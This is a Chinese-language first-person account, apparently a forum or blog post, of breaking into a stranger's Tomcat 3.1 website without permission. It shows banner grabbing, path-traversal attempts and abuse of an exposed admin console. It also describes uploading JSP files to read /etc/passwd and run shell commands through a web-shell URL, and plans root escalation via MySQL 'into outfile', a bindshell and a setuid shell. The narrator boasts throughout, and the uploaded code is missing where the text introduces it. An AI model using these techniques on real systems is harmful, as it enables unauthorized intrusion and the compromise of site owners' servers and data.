以下的文章主要向大家講述的是黑客攻擊技術WEB網站入侵的過程，很偶然的一個機會，看到了一個網站，頁面清新也很舒服的感覺。網站是用JSP開發(fā)的，由于個人的喜好，所以我決定看看系統(tǒng)的安全性。

telnetwww.target.com8080 GET/CHINANSLHTTP/1.1 
[Enter] [Enter] 
返回的結果如下： HTTP/1.0404NotFound 
Date:Sun,08Jul200107:49:13GMT Servlet-Engine:TomcatWebServer/3.1(JSP1.1;Servlet2.2;Java1.2.2;Linux2 
.2.12i386;java.vendor=BlackdownJava-LinuxTeam) Content-Language:en 
Content-Type:text/html Status:404 
Error:404 Location:/CHINANSLFileNotFound/CHINANSL 

我獲得了運行的WEBServer的名稱"Tomcat 3.1"。我記得我曾經發(fā)現(xiàn)過這個版本的漏洞，并且post到bugtrap上去過。大概是：通過".."技術可以退出WEB目錄，于是：

http://target:8080/../../../../%00.jsp（不行） http://target:8080/file/index.jsp（不行） 
http://target:8080/index.JSP（不行） http://target:8080/index.jsp%81（不行） 
http://target:8080/index.js%70（不行） http://target:8080/index.jsp%2581（不行） 
http://target:8080/WEB-INF/（不行） 

嗯，在試試吧！Tomcat 3.1自帶了一個管理工具，可以查看WEB下的目錄及文件，并且可以添加context.試一下：http://target:8080/admin/ ，管理員果然沒有刪除或禁止訪問這個目錄。接著我點"VIEW ALL CONTEXT"按鈕，列出了WEB目錄下的一些文件和目錄的名稱，我開始仔細的看了起來，一小會兒，發(fā)現(xiàn)了一個上傳文件的組件，嘿嘿，寫一個jsp文件弄上去看看。幾口咖啡的時間，我寫了這么一個東東出來：

通過上傳的組件將這個jsp上傳到對方的WEB目錄里，然后：

http://target:8080/upload/test.jsp?file=/etc/passwd

嘿嘿，密碼出來啦。我只看了"/etc/passwd"，并沒有看"/etc/shadow"，因為當時考慮webserver一般使用nobody的身份啟動的，看了也白看。（失誤）接下來的過程是無聊的猜測密碼，沒有成功。算了，那我只有將就點，反正現(xiàn)在我相當于有了一個shell了嘛，猜不出密碼上去，那就全當IE是我的SHELL環(huán)境吧！

再寫：

然后把這個jsp又通過upload上傳了上去，嘿嘿，我現(xiàn)在有個SHELL了。

http://target:8080/upload/cmd.jsp?cmd=ls+-la+/

（我這里就不列出來了）

怎么獲得root呢？經過一番搜索我發(fā)現(xiàn)了系統(tǒng)安裝了mysql并且我從jsp的源代碼中得到了mysql的密碼：）看看是什么權限運行的mysql：

sqld">http://target:8080/upload/cmd.jsp?cmd=ps+aux+　grep+mysqld

顯示：

root874940.21.9173004800p0-S28Jun015:54.72/usr/local/data/mysql

嘿嘿，有辦法了，系統(tǒng)是以root身份運行的mysql，同時我知道了mysql的密碼，那我現(xiàn)在我可以寫一個shell程序，讓它create一個表，然后將我的數(shù)據(jù)放到表中，然后再使用"select ... into outfile;"的辦法在系統(tǒng)上創(chuàng)建一個文件，讓用戶在執(zhí)行su的時候，運行我的程序。（還記得apache.org有一次被WEB網站入侵嗎？hacker就采用的這種辦法）。

然后，我再上傳bindshell之類的程序，運行、獲得nobody的權限，然后......再使用su root時幫忙創(chuàng)建的setuid shell讓自己成為root.嘿嘿，真是好辦法，我都為我的想法感到得意......